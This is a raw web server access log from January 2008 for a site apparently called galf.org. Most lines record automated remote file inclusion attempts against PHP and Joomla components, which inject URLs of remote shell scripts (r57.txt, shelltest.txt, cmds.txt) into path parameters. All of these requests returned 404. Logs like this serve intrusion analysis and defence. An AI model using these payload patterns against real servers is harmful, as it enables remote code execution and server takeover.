202.133.244.36 - - [06/Jan/2008:17:22:01 -0800] "GET /logs//include.php?path[docroot]=http://nexouz.we.bs/apc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.7.198.72 - - [06/Jan/2008:17:22:10 -0800] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.208.99.103 - - [06/Jan/2008:17:22:45 -0800] "GET /logs/access_071217.log/main.php?x=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
163.27.43.2 - - [06/Jan/2008:17:26:04 -0800] "GET /logs/access_070910.log//skin/zero_vote/ask_password.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.174.96.200 - - [06/Jan/2008:17:26:58 -0800] "GET /modules/My_eGallery/index.php?basepath=http://edukator.owsiiz.edu.pl/~mr4239/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
121.173.130.140 - - [06/Jan/2008:17:27:57 -0800] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
121.173.130.140 - - [06/Jan/2008:17:27:58 -0800] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.133.244.36 - - [06/Jan/2008:17:28:06 -0800] "GET /logs/access_070924.log//include.php?path[docroot]=http://nexouz.we.bs/apc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.22.173 - - [06/Jan/2008:17:28:53 -0800] "GET /logs/access_071015.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
213.184.18.198 - - [06/Jan/2008:17:29:07 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://edukator.owsiiz.edu.pl/~mr4239/spread.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.184.18.198 - - [06/Jan/2008:17:29:08 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://edukator.owsiiz.edu.pl/~mr4239/spread.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.98.150.12 - - [06/Jan/2008:17:29:14 -0800] "GET /logs/access_070910.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.herrn-der-zeiten.de/files/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.12.48.214 - - [06/Jan/2008:17:30:13 -0800] "GET /logs/access_071105.log//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.12.48.214 - - [06/Jan/2008:17:30:13 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.12.48.214 - - [06/Jan/2008:17:30:15 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.177.128.128 - - [06/Jan/2008:17:30:16 -0800] "GET /logs/access_071105.log/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.177.128.128 - - [06/Jan/2008:17:30:21 -0800] "GET /index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.177.128.128 - - [06/Jan/2008:17:30:21 -0800] "GET /logs/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.177.128.128 - - [06/Jan/2008:17:30:21 -0800] "GET /logs/access_071029.log/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=http://www.bosainternet.com/docs/boo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.28.244.74 - - [06/Jan/2008:17:30:56 -0800] "GET /logs/access_071210.log/index.php?nic=http://www.laila.jp/item_pics/derf/vox.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.28.244.74 - - [06/Jan/2008:17:30:57 -0800] "GET /index.php?nic=http://www.laila.jp/item_pics/derf/vox.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.28.244.74 - - [06/Jan/2008:17:30:57 -0800] "GET /logs/index.php?nic=http://www.laila.jp/item_pics/derf/vox.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.124.110 - - [06/Jan/2008:17:31:13 -0800] "GET /logs/access_071210.log/inc/common.php?env[include_prefix]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
216.246.124.110 - - [06/Jan/2008:17:31:13 -0800] "GET /logs/inc/common.php?env[include_prefix]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.122.223.146 - - [06/Jan/2008:17:32:04 -0800] "GET /logs/access_071203.log/index.php?_REQUEST=&_REQUEST[option]=com_akobook&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.122.223.146 - - [06/Jan/2008:17:32:04 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_akobook&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.122.223.146 - - [06/Jan/2008:17:32:04 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_akobook&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.12.48.214 - - [06/Jan/2008:17:32:23 -0800] "GET /logs/access_071217.log//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.28.244.74 - - [06/Jan/2008:17:32:28 -0800] "GET /logs/access_071015.log/index.php?x=http://www.laila.jp/item_pics/derf/vox.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.28.244.74 - - [06/Jan/2008:17:32:29 -0800] "GET /index.php?x=http://www.laila.jp/item_pics/derf/vox.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.28.244.74 - - [06/Jan/2008:17:32:29 -0800] "GET /logs/index2.php?x=http://www.laila.jp/item_pics/derf/vox.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.28.244.74 - - [06/Jan/2008:17:32:29 -0800] "GET /logs/index.php?x=http://www.laila.jp/item_pics/derf/vox.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.28.244.74 - - [06/Jan/2008:17:32:29 -0800] "GET /index2.php?x=http://www.laila.jp/item_pics/derf/vox.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
89.89.224.76 - - [06/Jan/2008:17:32:45 -0800] "GET /logs/access_071231.log HTTP/1.0" 200 334080 "-" "Wget/1.10.2"
66.135.34.231 - - [06/Jan/2008:17:32:54 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://222.122.158.214/bbs1/skin/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
66.135.34.231 - - [06/Jan/2008:17:32:54 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://222.122.158.214/bbs1/skin/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
200.196.254.164 - - [06/Jan/2008:17:33:35 -0800] "GET /logs/index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.196.254.164 - - [06/Jan/2008:17:33:35 -0800] "GET /index2.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.55.148.27 - - [06/Jan/2008:17:33:54 -0800] "GET /index.php?option=com_bsq_sitestats&task=view&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
72.55.148.27 - - [06/Jan/2008:17:33:54 -0800] "GET /logs/index.php?option=com_bsq_sitestats&task=view&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
74.200.83.90 - - [06/Jan/2008:17:34:04 -0800] "GET /logs/access_070820.log/index2.php?content=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.83.90 - - [06/Jan/2008:17:34:05 -0800] "GET /index2.php?content=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.83.90 - - [06/Jan/2008:17:34:05 -0800] "GET /logs/index2.php?content=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.83.90 - - [06/Jan/2008:17:34:08 -0800] "GET /logs/access_070730.log/index2.php?content=http://www.sonixsoft.de//libraries/pcl/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.84.94.98 - - [06/Jan/2008:17:34:26 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.unej.ac.id//content/data/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.galf.org"
70.84.94.98 - - [06/Jan/2008:17:34:26 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.unej.ac.id//content/data/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
74.6.22.173 - - [06/Jan/2008:17:34:45 -0800] "GET /logs/access_071028.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.28.244.74 - - [06/Jan/2008:17:34:54 -0800] "GET /logs/access_071119.log/index.php?x=http://www.laila.jp/item_pics/derf/vox.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.246.15.59 - - [06/Jan/2008:17:35:02 -0800] "GET /logs/access_070910.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://thermair.co.uk//media/logs/Goid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
77.232.68.17 - - [06/Jan/2008:17:35:05 -0800] "GET /logs/access_071210.log/modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.17 - - [06/Jan/2008:17:35:05 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.17 - - [06/Jan/2008:17:35:08 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.196.254.164 - - [06/Jan/2008:17:35:17 -0800] "GET /logs/access_071015.log/index.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
200.196.254.164 - - [06/Jan/2008:17:35:18 -0800] "GET /index.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.196.254.164 - - [06/Jan/2008:17:35:18 -0800] "GET /logs/index.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.17 - - [06/Jan/2008:17:35:25 -0800] "GET /logs/access_070826.log/modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
82.66.124.141 - - [06/Jan/2008:17:35:33 -0800] "GET /logs/access_070924.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
200.196.254.164 - - [06/Jan/2008:17:35:34 -0800] "GET /logs/access_071210.log/index.php?nic=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.196.254.164 - - [06/Jan/2008:17:35:35 -0800] "GET /index.php?nic=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.196.254.164 - - [06/Jan/2008:17:35:35 -0800] "GET /logs/index.php?nic=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.17 - - [06/Jan/2008:17:35:36 -0800] "GET /logs/access_071008.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.17 - - [06/Jan/2008:17:35:36 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.17 - - [06/Jan/2008:17:35:36 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.17 - - [06/Jan/2008:17:35:37 -0800] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebtown.com/darkscan/testmod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
211.230.148.86 - - [06/Jan/2008:17:35:38 -0800] "GET /logs/access_070924.log/index.php?p=http://army5.com.br/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.66.124.141 - - [06/Jan/2008:17:35:48 -0800] "GET /logs/access_071112.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
219.94.144.249 - - [06/Jan/2008:17:35:56 -0800] "GET /logs/access_070827.log//adminfoot.php?path%5Bdocroot%5D=http://www.santacruzlive.com/ui/administrator/components/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.19.110 - - [06/Jan/2008:17:36:20 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
74.6.22.13 - - [06/Jan/2008:17:36:20 -0800] "GET /labia/?M=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "galf.org"
66.7.198.72 - - [06/Jan/2008:17:36:54 -0800] "GET /logs/access_070910.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.249.30.130 - - [06/Jan/2008:17:37:37 -0800] "GET /index.php?option=com_bsq_sitestats&task=view&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
72.249.30.130 - - [06/Jan/2008:17:37:37 -0800] "GET /logs/index.php?option=com_bsq_sitestats&task=view&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
205.234.184.84 - - [06/Jan/2008:17:37:47 -0800] "GET /logs/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.184.84 - - [06/Jan/2008:17:37:48 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.22.240.103 - - [06/Jan/2008:17:38:09 -0800] "GET /logs/access_071105.log//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.22.240.103 - - [06/Jan/2008:17:38:09 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.22.240.103 - - [06/Jan/2008:17:38:09 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.11.114.236 - - [06/Jan/2008:17:38:37 -0800] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.114.236 - - [06/Jan/2008:17:38:37 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.114.236 - - [06/Jan/2008:17:38:37 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.11.114.236 - - [06/Jan/2008:17:38:45 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.196.254.164 - - [06/Jan/2008:17:38:51 -0800] "GET /logs/access_071119.log/index.php?x=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
163.27.43.2 - - [06/Jan/2008:17:39:07 -0800] "GET /logs/access_070730.log//skin/zero_vote/ask_password.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
163.27.43.2 - - [06/Jan/2008:17:39:08 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
163.27.43.2 - - [06/Jan/2008:17:39:09 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.232.68.17 - - [06/Jan/2008:17:39:39 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.66.124.141 - - [06/Jan/2008:17:42:23 -0800] "GET /logs/access_071224.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
82.66.124.141 - - [06/Jan/2008:17:42:25 -0800] "GET /logs/access_071029.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43"
82.66.124.141 - - [06/Jan/2008:17:42:34 -0800] "GET /logs/access_070826.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
64.22.240.103 - - [06/Jan/2008:17:42:58 -0800] "GET /logs/access_071217.log//convert/mvcw.php?step=1&vwar_root=http://i-play.org/ns1/shelltest.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.66.124.141 - - [06/Jan/2008:17:42:58 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
72.30.216.93 - - [06/Jan/2008:17:43:09 -0800] "GET /logs/access_071014.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.208.99.103 - - [06/Jan/2008:17:43:19 -0800] "GET /logs/access_071210.log/index.php?doc=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.208.99.103 - - [06/Jan/2008:17:43:23 -0800] "GET /index.php?doc=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
74.208.99.103 - - [06/Jan/2008:17:43:24 -0800] "GET /logs/index.php?doc=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.66.124.141 - - [06/Jan/2008:17:43:36 -0800] "GET /logs/access_071008.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:17:43:41 -0800] "GET /logs/access_071029.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:17:43:41 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:17:43:41 -0800] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.11.114.236 - - [06/Jan/2008:17:43:46 -0800] "GET /logs/access_071015.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:17:44:12 -0800] "GET /logs/access_071029.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:17:44:12 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
208.186.78.42 - - [06/Jan/2008:17:44:12 -0800] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
72.55.148.27 - - [06/Jan/2008:17:44:18 -0800] "GET /logs/index.php?option=com_juga&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.galf.org"
66.11.114.236 - - [06/Jan/2008:17:44:22 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.55.148.27 - - [06/Jan/2008:17:44:23 -0800] "GET /index.php?option=com_juga&Itemid=&mosConfig_absolute_path=http://www.humanesociety.com/media/phpbo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:17:44:36 -0800] "GET /logs/access_070827.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:17:44:53 -0800] "GET /logs/access_070827.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.38.24.138 - - [06/Jan/2008:17:44:56 -0800] "GET /logs//tools/send_reminders.php?includedir=http://apm.hk/content/strings.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.38.24.138 - - [06/Jan/2008:17:44:56 -0800] "GET //tools/send_reminders.php?includedir=http://apm.hk/content/strings.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.186.78.42 - - [06/Jan/2008:17:45:11 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
77.232.68.17 - - [06/Jan/2008:17:45:15 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebtown.com/darkscan/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
210.155.83.79 - - [06/Jan/2008:17:45:18 -0800] "GET /logs/access_070604.log//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.spectrum-team.com/kel/id.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:17:45:40 -0800] "GET /logs/access_071029.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.22.10.83 - - [06/Jan/2008:17:45:40 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
195.22.10.83 - - [06/Jan/2008:17:45:41 -0800] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.ebci.ucr.ac.cr/administrator/images/.on?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
